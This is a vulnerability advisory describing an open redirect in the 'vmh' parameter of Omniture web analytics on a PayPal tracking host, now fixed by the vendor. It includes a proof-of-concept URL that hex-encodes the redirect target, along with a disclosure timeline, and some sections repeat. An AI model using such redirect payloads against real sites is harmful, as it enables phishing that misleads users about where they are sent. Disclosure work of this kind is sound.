SSCHADV2013-003 - Omniture web analytics - Open Redirection vulnerability
Advisory:
|
Omniture web analytics – Open Redirection vulnerability
|
Advisory ID:
|
SSCHADV2013-003
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on paypal.112.2o7.net
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘vmh’-Parameter in Omniture web analytics is prone to a Open Redirection vulnerability
======================
PoC-Exploit
======================
// Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65)
PoC-Exploit
======================
// Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65)
http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65&ndh=1&vmt=51437A79&ce=UTF-8&cc=USD&v5=DE&c6=9WG20829AV167542H&c7=premier&v7=premier:verified:unrestricted&c8=verified&c9=unrestricted&c10=de&v19=premier&c20=1360528993&c26=submit.x&&c35=in&c40=a0df0db936e73&c43=log%20in&c47=D=pageName&c50=de_de&&c54=100&c56=no&s=1440×900&c=24&j=1.7&v=Y&k=Y&bw=1440&bh=675&&pid=log%20in&pidt=1&oid=Einloggen&oidt=3&ot=SUBMIT&AQE=1 |
======================
Solution
======================
Fixed by vendor
======================
Disclosure Timeline
======================
19-Feb-2013 – informed vendor by contact form
02-Mar-2013 – vendor informed by e-mail 04-Mar-2013 – feedback from vendor
04-Mar-2013 – sent detailed information to vendor
06-Mar-2013 – feedback from Adobe PSIRT (Adobe Product Security Incident Response Team)
29-Apr-2013 – asking about the current status
02-May-2013 – feedback from Adobe PSIRT (Adobe Product Security Incident Response Team)
|
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.omniture.com/de/privacy/2o7
http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.omniture.com/de/privacy/2o7
http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt
Comments
Display comments as Linear | Threaded